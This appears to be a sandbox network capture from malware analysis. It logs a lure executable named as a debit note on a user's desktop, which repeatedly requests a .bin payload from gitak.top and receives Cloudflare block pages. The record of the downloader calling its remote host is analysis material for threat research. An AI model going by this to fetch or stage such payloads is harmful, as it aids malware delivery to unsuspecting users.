2024-08-26 13:32:13 UTC	539	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:32:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NgEhfWjdjolm1FJXrloz1DZi79zCpnH9fTlsevcj0h82A9JUxHBK8pXkQgcAHqzn1qTdJ%2FN%2FXv8XMbj0ToEAl2sUHsdl%2FmX0zV0AhBCS08NpeLG7w9AWBU3KrI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b942fca7fd51fce-IAD
2024-08-26 13:32:13 UTC	830	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:32:13 UTC	1369	IN	Data Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:32:13 UTC	1369	IN	Data Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 70 65 65 78 78 70 4d 74 45 69 59 39 76 49 6b 44 72 57 76 53 50 7a 6d 6a 78 65 47 4e 5f 43 71 7a 58 45 38 4b 77 31 6a 53 55 71 49 2d 31 37 32 34 36 37 39 31 33 33 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 Data Ascii: <input type="hidden" name="atok" value="peexxpMtEiY9vIkDrWvSPzmjxeGN_CqzXE8Kw1jSUqI-1724679133-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
2024-08-26 13:32:13 UTC	850	IN	Data Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
2024-08-26 13:32:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49818	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:32:24 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:32:24 UTC	541	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:32:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HP1l20aBthmst0OIwCltFk%2FqGqRtArstkZS9948E10fXjBbSEjNSMOKdNkyEBC%2FCY8p8a5ssDsYxCKdk3QB2fcKN%2BbVQU4M7Mm6uVFyyXHe1Vfh2P%2FKDq4KaEqE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b94300c283e9c52-IAD
2024-08-26 13:32:24 UTC	828	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:32:24 UTC	1369	IN	Data Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
2024-08-26 13:32:24 UTC	1369	IN	Data Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 55 55 6d 47 69 6b 42 70 4e 31 63 6c 47 51 7a 6c 77 72 4f 45 70 62 6e 31 61 61 6b 73 45 4f 6c 70 46 66 4b 41 4f 62 56 42 2e 6b 6b 2d 31 37 32 34 36 37 39 31 34 34 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 Data Ascii: <input type="hidden" name="atok" value="UUmGikBpN1clGQzlwrOEpbn1aaksEOlpFfKAObVB.kk-1724679144-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
2024-08-26 13:32:24 UTC	852	IN	Data Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 Data Ascii: r sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
2024-08-26 13:32:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49819	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:32:34 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:32:34 UTC	543	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:32:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pgno87otjhinuC0ydtfGEvSF0MnSortLLmRC%2F8zi17ctFRhSLYTKzubMIiT8afP49pBAtVASF%2Fsdqc7OEQ%2FFaE7Ukn6oF6cyG8vEyZLZ0uVy2wt%2FEK3lWj%2Fz8k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b94304dd93cc989-IAD
2024-08-26 13:32:34 UTC	826	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:32:34 UTC	1369	IN	Data Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
2024-08-26 13:32:34 UTC	1369	IN	Data Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 55 33 41 78 74 34 47 6f 30 4a 57 41 5f 73 45 71 62 4a 75 7a 6f 43 6a 41 4e 55 35 4d 75 64 46 6f 65 37 70 53 6a 47 73 4a 44 35 4d 2d 31 37 32 34 36 37 39 31 35 34 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 Data Ascii: <input type="hidden" name="atok" value="U3Axt4Go0JWA_sEqbJuzoCjANU5MudFoe7pSjGsJD5M-1724679154-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
2024-08-26 13:32:34 UTC	854	IN	Data Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 Data Ascii: tor sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
2024-08-26 13:32:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49820	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:32:45 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:32:45 UTC	539	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:32:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JbPzkgrUQ088oxM6bYSOwNi4IKtbjnnXiLuiydvCjr9Hgg%2FJyafOOlwgpQzdIOWCZ8PwYlPO%2F2GCwqBTL2aBvwXv3tNLSLsToHP47FZKXBQhZMZItRpXw%2FXmArA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b94308fb88fc983-IAD
2024-08-26 13:32:45 UTC	830	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:32:45 UTC	1369	IN	Data Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:32:45 UTC	1369	IN	Data Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 50 50 72 43 58 56 77 5f 6e 6e 65 78 6a 67 34 6d 32 75 55 38 57 63 4b 78 62 6d 67 7a 5a 37 6c 4b 77 6b 4d 48 31 43 67 76 45 4f 51 2d 31 37 32 34 36 37 39 31 36 35 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 Data Ascii: <input type="hidden" name="atok" value="PPrCXVw_nnexjg4m2uU8WcKxbmgzZ7lKwkMH1CgvEOQ-1724679165-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
2024-08-26 13:32:45 UTC	850	IN	Data Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
2024-08-26 13:32:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49821	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:32:55 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
